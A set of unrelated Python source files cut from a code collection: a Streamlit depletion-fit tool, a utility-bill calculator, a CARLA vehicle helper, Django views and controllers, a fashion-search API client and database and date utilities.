self.nn_slider = st.sidebar.slider("Nn0", 0.0, np.float(Nn0*10), np.float(Nn0))
def runFit(self, Koff, Kon, N, Na0, Nn0, plot=True):
uKoff = uf(Koff, self.Koff_err)
uN = uf(N, self.N_err)
uNa0 = uf(Na0, self.Na0_err)
uNn0 = uf(Nn0, self.Nn0_err)
uKon = uf(Kon, self.Kon_err)
lg1 = f"Kon: {uKon:.2uP}, Na: {uNa0:.2uP}, Nn: {uNn0:.2uP}"
lg2 = f"Koff: {uKoff:.2uP}, N: {uN:.2uP}"
self.get_depletion_fit(Koff, N, uKoff, uN, Na0, Nn0, Kon, uNa0, uNn0, uKon, plot)
self.get_relative_abundance_fit(plot)
self.fig.update_layout(title_text=f"ON: {self.resOnFile.stem}[{self.powerOn}mJ], OFF: {self.resOffFile.stem}[{self.powerOff}mJ];\
A: {self.uA*100:.2uP}%; [Kon: {uKon:.2uP}, Koff: {uKoff:.2uP}]")
def get_timescan_data(self):
self.data1 = {"resOn":{}, "resOff": {}}
self.time = {"resOn":[], "resOff": []}
self.counts = {"resOn":[], "resOff": []}
self.error = {"resOn":[], "resOff": []}
self.ax0_plot = {}
for index, scanfile, i in zip(["resOn", "resOff"], [self.resOnFile, self.resOffFile], [0, 2]):
time, counts, error, self.mass, self.t_res, self.t_b0 = timescanplot(scanfile).get_data()
time = time/1000 # ms to s
self.time[index] = np.array(time[self.timeStart:])
self.counts[index] = np.array(counts[self.massIndex][self.timeStart:])
self.error[index] = np.array(error[self.massIndex][self.timeStart:])
self.power[index] = np.array((self.power[index] * self.nshots * self.time[index]))
# self.ax0.errorbar(self.power[index], self.counts[index], yerr=self.error[index], fmt=f"C{i}.")
error_data = dict(type="data", array=self.error[index], visible=True)
trace = go.Scatter(x=self.power[index], y=self.counts[index], error_y=error_data, name=index, mode="markers", marker=dict(color=f"rgb{colors[i]}"))
self.fig.add_trace(trace, row=1, col=1)
def N_OFF(self, x, K_OFF, N): return (N)*np.exp(-K_OFF*x)
def resOff_fit(self, auto_plot=True):
K_OFF_init = 0
N_init = self.counts["resOff"].max()
pop_off, popc_off = curve_fit(
self.N_OFF, self.power["resOff"], self.counts["resOff"],
sigma=self.error["resOff"],
absolute_sigma=True,
p0=[K_OFF_init, N_init],
bounds=[(-np.inf, 0), (np.inf, N_init*2)]
)
perr_off = np.sqrt(np.diag(popc_off))
Koff, N= pop_off
self.Koff_err, self.N_err= perr_off
if auto_plot: return Koff, N
def N_ON(self, x, Na0, Nn0, K_ON):
K_OFF = self.Koff
return Na0*np.exp(-K_ON*x)*np.exp(-K_OFF*x) + Nn0*np.exp(-K_OFF*x)
def resOn_fit(self, Koff, N, auto_plot=True):
self.Koff = Koff
Na0_init, Nn0_init, K_ON_init = N, N/2, 0
pop_on, popc_on = curve_fit(
self.N_ON, self.power["resOn"], self.counts["resOn"],
sigma=self.error["resOn"],
absolute_sigma=True,
p0=[Na0_init, Nn0_init, K_ON_init],
bounds=[(0, 0, -np.inf), (N , N*2, np.inf)]
)
perr_on = np.sqrt(np.diag(popc_on))
Na0, Nn0, Kon = pop_on
self.Na0_err, self.Nn0_err, self.Kon_err = perr_on
if auto_plot: return Na0, Nn0, Kon
def uN_OFF(self, x, uN, uK_OFF): return uN*unp.exp(-uK_OFF*x)
def uN_ON(self, x, uNa0, uNn0, uK_OFF, uK_ON): return uNa0 * \
unp.exp(-uK_ON*x)*unp.exp(-uK_OFF*x) + uNn0*unp.exp(-uK_OFF*x)
def get_depletion_fit(self, Koff, N, uKoff, uN, Na0, Nn0, Kon, uNa0, uNn0, uKon, plot=True):
self.Kon = Kon
self.Koff = Koff
maxPower = np.append(self.power["resOn"], self.power["resOff"]).max()*2
self.fitX = np.linspace(0, maxPower, 20)
ufitX = unp.uarray(self.fitX, np.zeros(len(self.fitX)))
self.fitOn = self.N_ON(self.fitX, Na0, Nn0, self.Kon)
self.fitOff = self.N_OFF(self.fitX, Koff, N)
self.fitOn_with_err = self.uN_ON(ufitX, uNa0, uNn0, uKoff, uKon)
self.fitOff_with_err = self.uN_OFF(ufitX, uKoff, uN)
self.fitted_counts_error = {"resOn": unp.std_devs(self.fitOn_with_err), "resOff": unp.std_devs(self.fitOff_with_err)}
print(f"Exp counts error: {self.error}\nFitted counts error: {self.fitted_counts_error}\n")
self.fitted_counts = {"resOn":np.array(self.fitOn), "resOff": np.array(self.fitOff)}
print(f"Counts: {self.counts}\nFitted: {self.fitted_counts}\n")
if plot:
for index, fitY, i in zip(["resOn", "resOff"], [self.fitOn, self.fitOff], [0, 2]):
trace = go.Scatter(x=self.fitX, y=fitY, mode="lines", marker=dict(color=f"rgb{colors[i]}"), showlegend=False)
self.fig.add_trace(trace, row=1, col=1)
lg1 = f"Kon: {uKon:.2uP}, Na: {uNa0:.2uP}, Nn: {uNn0:.2uP}"
lg2 = f"Koff: {uKoff:.2uP}, N: {uN:.2uP}"
st.subheader(lg1)
st.subheader(lg2)
def Depletion(self, x, A):
K_ON = self.Kon
return A*(1-np.exp(-K_ON*x))
def get_relative_abundance_fit(self, plot=True):
self.depletion_fitted = 1 - (self.fitted_counts["resOn"]/self.fitted_counts["resOff"])
depletion_fitted_with_err = 1 - (unp.uarray(self.fitted_counts["resOn"], self.fitted_counts_error["resOn"])/unp.uarray(self.fitted_counts["resOff"], self.fitted_counts_error["resOff"]))
self.depletion_fitted_err = unp.std_devs(depletion_fitted_with_err)
self.depletion_exp = 1 - (self.counts["resOn"]/self.counts["resOff"])
depletion_exp_with_err = 1 - (unp.uarray(self.counts["resOn"], self.error["resOn"])/unp.uarray(self.counts["resOff"], self.error["resOff"]))
self.depletion_exp_err = unp.std_devs(depletion_exp_with_err)
A_init = 0.5
pop_depletion, popc_depletion = curve_fit(
self.Depletion, self.fitX, self.depletion_fitted,
sigma=self.depletion_fitted_err,
absolute_sigma=True,
p0=[A_init],
bounds=[(0), (1)]
)
perr_depletion = np.sqrt(np.diag(popc_depletion))
A = pop_depletion
A_err = perr_depletion
self.uA = uf(A, A_err)
print(f"A: {self.uA:.3uP}")
self.relative_abundance = self.Depletion(self.fitX, A)
if plot:
error_data = dict(type="data", array=self.depletion_exp_err, visible=True)
trace1 = go.Scatter(x=self.power["resOn"], y=self.depletion_exp, mode="markers", marker=dict(color=f"black"), name="Exp", error_y=error_data)
trace2 = go.Scatter(x=self.fitX, y=self.depletion_fitted, mode="lines+markers", marker=dict(color=f"rgb{colors[0]}"), name="Fitted")
trace3 = go.Scatter(x=self.fitX, y=self.relative_abundance, mode="lines+markers", marker=dict(color=f"rgb{colors[2]}"), name="Relative")
self.fig.add_trace(trace1, row=1, col=2)
self.fig.add_trace(trace2, row=1, col=2)
self.fig.add_trace(trace3, row=1, col=2)
st.subheader(f"Relative abundance: {self.uA*100:.3uP} %")
if __name__ == "__main__":
args = sys.argv[1:]
location = args[0]
scanfiles = args[1:]
if location == "undefined":
st.title("Location is undefined. Please close this and browse location containing timescan files")
elif len(scanfiles)<1: st.title("This location doesn't have any timescan files")
else:
if st.checkbox("Graph is not properly scaled ?"): st.title("Click top right corner: Settings --> Show app in wide mode")
depletionplot(location) |
#!/usr/bin/env python3
# file: utility_cost_calc.py
"""
Reads a csv file containing meeter readings.
The name of the csv file can be provided as a parameter.
If not parameter is provided, 'readings.csv' is the default.
Returns a report to standard output.
Typical usage:
./utility_cost_calc.py [input.csv] >> statement.txt
The input file must be of a format shown in accompanying csv files.
See README.rst for details.
Released under the GNU General Public License of your choosing.
©Alex Kleider [email protected]
"""
import sys
import csv
import datetime
readings_file = "readings.csv"
DEFAULT_CURRENCY_SIGN = '$'
# Re: Propane
propane_info = """
Meter reads in cubic feet.
From:
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj9xIeC-83LAhUG92MKHWOEBBIQFggdMAA&url=http%3A%2F%2Fwww.edcgov.us%2FGovernment%2FAg%2FPropane_Conversion_Chart.aspx&usg=AFQjCNFSq8UUvwTExkGq_4SSyQmdszDKbA&sig2=3z3bhV6tNB_VVqRHZZGBrw
"""
gal_in_cu_ft = 0.0278 # Convert propane from cu ft to gallons.
def get_propane_cost(prev_reading, cur_reading, cost):
return cost * gal_in_cu_ft * (cur_reading - prev_reading)
# Re: Electricity
pge_info = """From:
http://www.pge.com/tariffs/tm2/pdf/ELEC_SCHEDS_E-1.pdf
'Basic' (E6/E1) usage in kWh/day is:
"""
old_rates = """
summer_base = 7.0 #| 'Basic' (E6/E1)
winter_base = 8.5 #| usage in kWh/day.
winter_months = [11, 12, 1, 2, 3,4]
"""
new_rates = """
See accompanying file "calculations" for new rates
as of before November 2019.
tier1_price = 0.18212
tier2_price = 0.25444
tier3_price = 0.37442
"""
summer_base = 6.8 #| 'Basic' (E6/E1)
winter_base = 8.2 #| usage in kWh/day.
winter_months = [10, 11, 12, 1, 2, 3, 4, 5]
tier1_price = 0.22981
tier2_price = 0.28920
tier3_price = 0.50667
month_lengths = {2: 28, 1: 31, #| Additional code
4: 30, 3: 31, #| accounts for
6: 30, 5: 31, #| length of February
9: 30, 7: 31, #| i.e. the leap yr
11: 30, 8: 31, #| algorithm:
10: 31,12: 31} #| days_in_february().
test_data = (
("2016-03-19","2016-04-16", 238.0),
("2016-04-16","2016-05-16", 231.0),
("2016-12-16","2017-01-14", 246.5),
("2016-03-04","2016-03-26", 187.0),
("2016-03-04","2016-02-01", None),
("2016-12-31","2017-02-01", 272.0),
)
def days_in_february(year):
"""
Returns 29 if leap year, else 28.
Assumes the year will NOT be less than 2000.
If <2000 or uninterpretable as a year,
returns None after printing a warning.
"""
try:
yr = int(year)
except ValueError:
print("Bad input for a year.")
return
if yr < 2000:
print("Probably an invalid year.")
return
if yr%400==0: return 29 # Divisible by 400: Leap year 2000
if yr%100==0: return 28 # Divisible by 100: ! leap year 2100
if yr%4==0: return 29 # Divisible by 4 : Leap year 2008
else: return 28 # ! divisible by 4: ! leap year 2009
def daysafter(date):
"""
Returns days remaining in the month
_after_ the date specified. Accounts for leap years.
"""
if date.month == 2:
return days_in_february(date.year) - date.day
return month_lengths[date.month] - date.day
def daysupto(date):
"""
Returns the number of days in the month
up to and including the day specified.
"""
return date.day
def base_usage(month, days):
"""
Returns the base usage earned
by the given number of days in the given month.
A helper function for the next two functions.
"""
if month in winter_months:
return winter_base * days
else:
return summer_base * days
def base_usage_after(date):
"""
Returns usage earned by the days after
the specified day in the specified month.
"""
return base_usage(date.month,
daysafter(date))
def base_usage_upto(date):
"""
Returns the usage earned by the days up to
and including the day in the month specified by date.
"""
return base_usage(date.month,
daysupto(date))
def get_base_usage(date1, date2):
"""
Returns the base usage earned by the interval
after the first and up to and including
the second of the dates specified.
If date2 is before or the same as date1, an
announcement is printed and None is returned.
"""
if (date2 - date1).days < 1:
print("Check your input!!")
return
if ((date2.month == date1.month)
and (date2.year == date1.year)):
return base_usage(date2.month,
date2.day - date1.day)
ret = base_usage_after(date1) + base_usage_upto(date2)
month = date1.month + 1
year = date1.year
if month == 13:
month = 1
year = year + 1
while ((date2.year >= year)
and (date2.month > month)):
if month == 2: month_length = days_in_february(year)
else: month_length = month_lengths[month]
if month in winter_months:
ret += winter_base * month_length
else:
ret += summer_base * month_length
month += 1
if month == 13:
month = 1
year += 1
# print("get_base_usage is returning '{}'.".format(ret))
return ret
def get_date(s):
"""
Returns a datetime.Date object
based on the string provided which must be
of the format YYYY-MM-DD (all are integers.)
If interpretation of the string fails, an
announcement is printed and None is returned.
"""
t = s.split('-')
try:
year = int(t[0])
month = int(t[1])
day = int(t[2])
except ValueError:
print("Unable to create a date from string provided.")
return
return datetime.date(year, month, day)
def get_pge_cost(kwh_used, base):
"""
Returns the cost of the kwh_used
Requires the base usage for its calculations.
Provides closure around the tier pricing.
"""
if kwh_used > (base * 2):
return ((kwh_used - 2 * base) * tier3_price
+ base * tier2_price
+ base * tier1_price )
elif kwh_used > base:
return (( kwh_used - base) * tier2_price
+ base * tier1_price )
else:
return kwh_used * tier1_price
def get_readings(readings_file):
"""
Returns a string showing content of the CSV input file.
"""
# print("Opening {}".format(readings_file))
with open(readings_file) as csvfile:
reader = csv.DictReader(csvfile)
# print(reader.fieldnames)
ret = ["""\nReading the Following Raw Data from: {}\n
Date cuft kWh Price/gal Paid Comments
---------- ------ ----- --------- ------- --------------- """
.format(readings_file)]
for row in reader:
line2add = (
"{Date} {cu_ft:>8}{kwh:>7}{propane_cost_per_gal:>10} {paid:>9} {comment}"
.format(**row))
ret.append(line2add)
# print("Appending: '{}'".format(line2add))
# .format(row['Date'], row['cu_ft'],
# row['current price of propane/gal'] ,row['kwh'],
# row['paid'], row['comment']))
return '\n'.join(ret)
def testing():
"""
A little test routine.
It can be made into a unit test in a future version.
"""
prev_date = datetime.date(2016,4,16)
cur_date = datetime.date(2016,5,23)
print(cur_date)
delta = cur_date - prev_date
print("delta days => {}.".format(delta.days))
print("Printing daysupto: {}.".format(daysupto(cur_date)))
print("base usage up to: {}.".format(base_usage_upto(cur_date)))
print("Printing days after: {}".format(daysafter(prev_date)))
print("base usage after: {}.".format(base_usage_after(prev_date)))
print("get_base_usage => {}."
.format(get_base_usage(prev_date, cur_date)))
print("=========================")
for prev, cur, result in test_data:
prev_date = get_date(prev)
cur_date = get_date(cur)
print(prev_date, cur_date)
print(get_base_usage(prev_date, cur_date), result)
print()
print("Expect 28 x 6:")
for year in (2009, 2010, 2011, 1800, 1900, 2100):
print(days_in_february(year))
print("Expect 29 x 5:")
for year in (2008, 2012, 2016, 2000, 2400):
print(days_in_february(year))
kwh_used = 60063 - 59708
date1 = "2016-04-16"
date2 = "2016-05-23"
owing = get_pge_cost(kwh_used, get_base_usage(
get_date(date1), get_date(date2)))
print("Calculated cost is ${:0.2f}".format(owing))
def normalizeValue(val):
"""
Normalizes currency values.
Provides for parens as an alternative to minus
and eliminates currency sign if present.
If both are used, the currency sign is expected
to be with in the parens.
"""
if val.startswith('(') and val.endswith(')'):
val = '-' + val[1:-1]
return val.replace(DEFAULT_CURRENCY_SIGN,'')
def get_report(readings_file):
"""
Prepares a report and returns it as a string.
Report includes starting and ending readings,
amount consumed and cost of each utility,
as well as the total, how much if any was paid,
and the amount outstanding.
"""
with open(readings_file) as csvfile:
reader = csv.DictReader(csvfile)
report = ["\n\nUTILITIES REPORT (Based on the above.)\n"]
report.append(
"""{}
{:<12} cuft Cost
{:<12} kWh Cost
{} | {} | {}\n"""
.format(
"Date Range", "Propane", "Electricity", "Total", "Paid", "Owing"))
row_number = 0
owing = 0
for row in reader:
row_number += 1
if row_number == 1:
cur_date = row['Date']
cur_gas = float(row['cu_ft'])
cur_kwh = float(row['kwh'])
continue
else:
prev_date = cur_date
prev_gas = float(cur_gas)
prev_kwh = float(cur_kwh)
cur_date = row['Date']
cur_gas = float(row['cu_ft'])
cur_kwh = float(row['kwh'])
gas_price = float(normalizeValue(
row['propane_cost_per_gal']))
paid = float(normalizeValue(row['paid']))
comment = row['comment']
cost_of_propane = get_propane_cost(
prev_gas, cur_gas, gas_price)
cost_of_electricity = get_pge_cost(
cur_kwh - prev_kwh,
get_base_usage(get_date(prev_date),
get_date(cur_date)))
total_cost = cost_of_propane + cost_of_electricity
owing += (total_cost - paid)
report.append(
"""from {} to {}
{} - {} = {:0.1f} ${:0.2f}
{} - {} = {:0.1f} ${:0.2f}
${:0.2f} | ${:0.2f} | ${:0.2f}\n""".format(prev_date, cur_date,
cur_gas, prev_gas, cur_gas - prev_gas, cost_of_propane,
cur_kwh, prev_kwh, cur_kwh - prev_kwh, cost_of_electricity,
total_cost, paid, owing) )
row_number += 1
report.append("""
Amount owed at time of program run: ${:0.2f}.
(The last dollar amount given above.)
""".format(owing))
return "\n".join(report)
if __name__ == "__main__":
args = sys.argv
if len(args)>1:
readings_file = args[1]
print(get_readings(readings_file))
print
print(get_report(readings_file))
|
import numpy as np
def get_leading_vehicle_unsafe(vehicle, vehicles, reference_waypoints, max_distance):
"""
Get leading vehicle wrt reference_waypoints or global_path.
!warning: distances between reference_waypoints cannot exceed any vehicle length.
Args:
reference_waypoints: list of carla.Waypoint
Returns:
"""
current_location = vehicle.get_location()
vehicle_id = vehicle.id
vehicle_half_height = vehicle.bounding_box.extent.z
func = lambda loc: loc.distance(current_location)
obstacles = [(func(o.get_location()), o) for o in vehicles if o.id != vehicle_id and func(o.get_location()) <= 1.001*max_distance]
sorted_obstacles = sorted(obstacles, key=lambda x:x[0])
leading_vehicle, leading_distance = None, 0.0
for i, waypoint in enumerate(reference_waypoints):
if i > 0: leading_distance += waypoint.transform.location.distance(reference_waypoints[i-1].transform.location)
if leading_distance > 1.001*max_distance: break
location = waypoint.transform.location
location.z += vehicle_half_height
for _, obstacle in sorted_obstacles:
obstacle_transform = obstacle.get_transform()
if obstacle.bounding_box.contains(location, obstacle_transform):
leading_vehicle = obstacle
longitudinal_e, _, _ = error_transform(obstacle_transform, waypoint.transform)
leading_distance += longitudinal_e
break
if leading_vehicle is not None: break
return leading_vehicle, leading_distance
def error_transform(current_transform, target_transform):
xr, yr, thetar = target_transform.location.x, target_transform.location.y, np.deg2rad(target_transform.rotation.yaw)
theta_e = pi2pi(np.deg2rad(current_transform.rotation.yaw) - thetar)
d = (current_transform.location.x - xr, current_transform.location.y - yr)
t = (np.cos(thetar), np.sin(thetar))
longitudinal_e, lateral_e = _cal_long_lat_error(d, t)
return longitudinal_e, lateral_e, theta_e
def _cal_long_lat_error(d, t):
'''
Args:
d, t: array-like
'''
dx, dy = d[0], d[1]
tx, ty = t[0], t[1]
longitudinal_e = dx*tx + dy*ty
lateral_e = dx*ty - dy*tx
return longitudinal_e, lateral_e
def pi2pi(theta):
return (theta + np.pi) % (2 * np.pi) - np.pi
|
from ..serializers import TiempoUnidadSerializer
from ..models import Tiempo_Unidad
class ControllerTiempoUnidad:
def creartiempounidad(request):
datostimpounidad = request.data
try:
tiempoUnidadNuevo = Tiempo_Unidad.objects.create(
unidad_es = datostimpounidad['unidad_es'],
unidad_en = datostimpounidad['unidad_en']
)
except Exception:
return {"estatus":"Error"}
return {"estatus":"Ok", 'tiempo_unidad': tiempoUnidadNuevo.unidad_es}
def listartiempounidad(id_tiempo_unidad=None):
if id_tiempo_unidad:
try:
queryset = Tiempo_Unidad.objects.get(id_tiempo_unidad=id_tiempo_unidad)
except Tiempo_Unidad.DoesNotExist:
return ({'result': 'No se encontró el tiempo de unidad deseado'})
serializer = TiempoUnidadSerializer(queryset)
return serializer.data
else:
queryset = Tiempo_Unidad.objects.all()
serializer = TiempoUnidadSerializer(queryset, many=True)
return serializer.data |
import sys
def solve(x):
isNegative = x < 0
x = str(x).strip('-')
r = int(x[::-1])
result = r if int(-2**31) <= r <= int(2**31) else 0
if isNegative:
result = -result
return result
if __name__ == '__main__':
# sys.stdin = open('./input.txt')
# n = int(input())
# arr = [int(x) for x in input().split()]
x = int(input())
result = solve(x)
print(result)
|
from setuptools import setup, find_packages
setup(name='python-markdown-generator',
version='0.1',
description='Python library for dynamically generating HTML sanitized Markdown syntax.',
long_description=open('README.md').read(),
url='https://github.com/Nicceboy/python-markdown-generator',
author='Niklas Saari',
author_email='[email protected]',
license='Apache-2.0',
packages=find_packages(),
zip_safe=False) |
#coding=utf-8
from comb import *
import re
m = PyMouse()
k = PyKeyboard()
def keyboard(command):
if command == "j":
k.press_key("j")
time.sleep(0.1)
k.release_key("j")
elif command == "k":
k.tap_key("k")
elif command =="jk":
k.press_keys(["j","k"])
elif command == "kl":
k.tap_key("kl")
elif command == "jjj":
k.press_key("a")
def msg_handler(msg):
print msg
actions = re.split(",|,", msg)
for action in actions:
commands = action.split("+")
if len(commands)>0:
if len(commands)==2 and commands[0] in ["star1","star2","star3","star4","star5","star6","combo1","combo2"]:
combo.combo_handler(commands)
else:
action_control.action_handler(commands)
def restart():
k.tap_key(k.alt_l_key)
k.tap_key("f")
k.tap_key(k.down_key,5)
k.tap_key(k.enter_key)
|
# -*- coding: utf-8 -*-
from django.contrib.auth import login as auth_login
from django.contrib.auth import authenticate, login
from django.shortcuts import render
from django.http.response import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.contrib.auth.models import User
from myAPI.checkcode import gcheckcode
# http://localhost:9000/home/myregister/
def myregister(request):
path = 'home/myregister.html'
g_checkcode = gcheckcode(request)
if request.method != 'POST':
return render(request, path, context=locals())
name = request.POST['username']
isname = User.objects.filter(username = name)
if isname:
messages.info(request, name + u' 用户已经注册!')
return HttpResponseRedirect('#')
email = request.POST['email']
password = request.POST['password']
if not name or not email or not password:
messages.info(request,'err: UserName NULL!')
return HttpResponseRedirect('#')
user = User.objects.create_user(name, email, password)
user.is_staff = False
user.is_superuser = False
user.save()
auth_login(request, user)
return HttpResponseRedirect('/')
# http://localhost:9000/home/mylogin/
def mylogin(request):
if request.method != 'POST':
return render(request, 'home/mylogin.html', context=locals())
username = request.POST['username']
password = request.POST['password']
href = request.POST['href']
if href == '': href = '/'
user = authenticate(username=username, password=password)
if user:
auth_login(request, user)#当函数名是login,必须用auth_login
return HttpResponseRedirect(href)
messages.info(request, u'登录失败!请输入一个正确的 用户名 和密码. 注意他们都是区分大小写的!')
return render(request, 'home/mylogin.html', context=locals())
|
""" Natural Language Search APIs.
https://cognitivefashion.github.io/slate/#natural-language-search
"""
__author__ = "Vikas Raykar"
__email__ = "[email protected]"
__copyright__ = "IBM India Pvt. Ltd."
__all__ = ["NaturalLanguageSearch"]
import os
import json
import requests
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
class NaturalLanguageSearch():
""" Natural Language Search APIs.
"""
def __init__(self,
api_gateway_url,
api_key,
version='v1',
data_collection_opt_out=False):
""" Initialization.
Parameters
----------
api_gateway_url : str
The api gateway url.
api_key : str
The api key.
version : str, optional (default: 'v1')
The api version.
data_collection_opt_out : boolean, optional (default: False)
https://cognitivefashion.github.io/slate/#data-collection
"""
self.api_gateway_url = api_gateway_url
self.version = version
self.api_key = api_key
self.headers = {}
self.headers['X-Api-Key'] = self.api_key
self.headers['X-Data-Collection-Opt-Out'] = str(data_collection_opt_out).lower()
#--------------------------------------------------------------------------
# Get a random fashion quote.
# GET /v1/fashion_quote
#--------------------------------------------------------------------------
def fashion_quote(self):
""" Get a random fashion quote.
https://cognitivefashion.github.io/slate/#fashion-quote
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params = {}
api_endpoint = '%s/fashion_quote'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Natural Language Semantic Search
# GET /v1/catalog/{catalog_name}/natural_language_search
# params : (required) query_text
# max_number_of_results
# max_number_of_backoffs
# return_elasticsearch_queries
#--------------------------------------------------------------------------
def natural_language_search(self,catalog_name,query_text,
max_number_of_results=12,
max_number_of_backoffs=5,
return_elasticsearch_queries=False):
""" Natural Language Semantic Search
https://cognitivefashion.github.io/slate/#natural-language-search28
Parameters
----------
catalog_name : str
the catalog name
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
max_number_of_results : int, optional(default:12)
maximum number of results to return
max_number_of_backoffs : int, optional(default:5)
maximum number of backoffs
Set to 0 if you want only one query.
return_elasticsearch_queries : str, optional(default:false)
If true returns the corresponding elasticsearch queries
(ordered from specific to general) in the query DSL format.
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
params['max_number_of_results'] = max_number_of_results
params['max_number_of_backoffs'] = max_number_of_backoffs
params['return_elasticsearch_queries'] = str(return_elasticsearch_queries).lower()
api_endpoint = '%s/catalog/%s/natural_language_search'%(self.version,
catalog_name)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Natural Language Semantic Search Elasticsearch Queries
# GET /v1/natural_language_search/elasticsearch_queries
# params : (required) query_text
# max_number_of_results
# max_number_of_backoffs
#--------------------------------------------------------------------------
def elasticsearch_queries(self,query_text,
max_number_of_results=12,
max_number_of_backoffs=5):
""" Get elasticsearch queries.
https://cognitivefashion.github.io/slate/#get-elasticsearch-queries
Parameters
----------
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
max_number_of_results : int, optional(default:12)
maximum number of results to return
max_number_of_backoffs : int, optional(default:5)
maximum number of backoffs
Set to 0 if you want only one query.
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
params['max_number_of_results'] = max_number_of_results
params['max_number_of_backoffs'] = max_number_of_backoffs
api_endpoint = '%s/natural_language_search/elasticsearch_queries'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Parse fashion text.
# GET /v1/natural_language_search/parse
# params : (required) query_text
# include_apparel_hyponyms
# include_apparel_hypernyms
# return_search_terms
#--------------------------------------------------------------------------
def parse(self,query_text,
include_apparel_hyponyms=False,
include_apparel_hypernyms=False,
return_search_terms=False):
""" Parse fashion text.
https://cognitivefashion.github.io/slate/#parse-fashion-query-text
Parameters
----------
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
params['include_apparel_hyponyms'] = str(include_apparel_hyponyms).lower()
params['include_apparel_hypernyms'] = str(include_apparel_hypernyms).lower()
params['return_search_terms'] = str(return_search_terms).lower()
api_endpoint = '%s/natural_language_search/parse'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
#--------------------------------------------------------------------------
# Spelling Correction.
# GET /v1/natural_language_search/spell_correct
# params : (required) query_text
#--------------------------------------------------------------------------
def spell_correct(self,query_text):
""" Parse fashion text.
https://cognitivefashion.github.io/slate/#spelling-correction
Parameters
----------
query_text : string
the natural language search query
(e.g. show me some abof red graphic print tees under 1k.)
Returns
-------
status_code : int
the status code of the response
response : json
the response
"""
params={}
params['query_text'] = query_text
api_endpoint = '%s/natural_language_search/spell_correct'%(self.version)
url = urljoin(self.api_gateway_url,api_endpoint)
response = requests.get(url,
headers=self.headers,
params=params)
return response.status_code,response.json()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
__title__ = "eeprivacy"
__description__ = "Energy Differential Privacy"
__url__ = "http://github.com/recurve-inc/eeprivacy"
__version__ = "0.0.5"
__author__ = "Marc Paré"
__author_email__ = "[email protected]"
|
"""
Goal: store utility functions
@authors:
Andrei Sura <[email protected]>
"""
import sys
import uuid
import logging
import unicodedata
from binascii import unhexlify
from itertools import zip_longest, islice, chain
from hashlib import sha256
from datetime import datetime
from datetime import date
import sqlalchemy as db
log = logging.getLogger(__package__)
# FORMAT_US_DATE = "%x"
# FORMAT_US_DATE_TIME = '%x %X'
FORMAT_DATABASE_DATE = "%Y-%m-%d"
# FORMAT_DATABASE_DATE_TIME = "%Y-%m-%d %H:%M:%S"
# table of punctuation characters + space
CHARS_TO_DELETE = dict.fromkeys(
i for i in range(sys.maxunicode)
if unicodedata.category(chr(i)).startswith('P') or
not chr(i).isalnum())
def prepare_for_hashing(text):
"""
Given a string with punctuation characters
"""
if not text:
return ''
return text.translate(CHARS_TO_DELETE).lower()
def get_uuid_bin(uuid_text=None):
"""
Note: the returned value needs to be hexlified to be human readable
"""
if not uuid_text:
uuid_text = uuid.uuid1()
lower = str(uuid_text).replace('-', '').lower()
return unhexlify(lower.encode())
# def get_db_url_sqlserver(db_host, db_port, db_name, db_user, db_pass):
# """
# Helper function for creating the "pyodbc" connection string.
#
# @see http://docs.sqlalchemy.org/en/latest/dialects/mssql.html
# @see https://code.google.com/p/pyodbc/wiki/ConnectionStrings
# """
# from urllib import parse
# params = parse.quote(
# "Driver={{FreeTDS}};Server={};Port={};"
# "Database={};UID={};PWD={};"
# .format(db_host, db_port, db_name, db_user, db_pass))
# return 'mssql+pyodbc:///?odbc_connect={}'.format(params)
def get_db_url_mysql(config):
"""
Format the configuration parameters to build the connection string
"""
if 'DB_URL_TESTING' in config:
return config['DB_URL_TESTING']
return 'mysql+mysqlconnector://{}:{}@{}/{}' \
.format(config['DB_USER'],
config['DB_PASS'],
config['DB_HOST'],
config['DB_NAME'])
def get_db_engine(config):
"""
@see http://docs.sqlalchemy.org/en/latest/core/connections.html
"""
# TODO: add support for connecting to sqlserver
db_name = config.get('DB_NAME')
url = get_db_url_mysql(config)
try:
engine = db.create_engine(url,
pool_size=10,
max_overflow=5,
pool_recycle=3600,
echo=False)
except TypeError as exc:
log.warning("Got exc from db.create_engine(): {}".format(exc))
engine = db.create_engine(url, echo=False)
return engine
def apply_sha256(val):
""" Compute sha256 sum
:param val: the input string
:rtype string: the sha256 hexdigest
"""
m = sha256()
m.update(val.encode('utf-8'))
return m.hexdigest()
def format_date_as_string(val, fmt='%m-%d-%Y'):
"""
:rtype str:
:return the input value formatted as '%Y-%m-%d'
:param val: datetime or string
:param fmt: the input format for the date
"""
if isinstance(val, date):
return val.strftime(fmt)
da = format_date(val, fmt)
if not da:
return ''
return da.strftime(FORMAT_DATABASE_DATE)
def format_date(val, fmt='%m-%d-%Y'):
"""
Transform the input string to a datetime object
:param val: the input string for date
:param fmt: the input format for the date
"""
date_obj = None
try:
date_obj = datetime.strptime(val, fmt)
except Exception as exc:
log.warning("Problem formatting date: {} - {} due: {}"
.format(val, fmt, exc))
return date_obj
def list_grouper(iterable, n, fillvalue=None):
"""
Collect data into fixed-length chunks or blocks.
From: https://docs.python.org/2.7/library/itertools.html#recipes
Example: grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
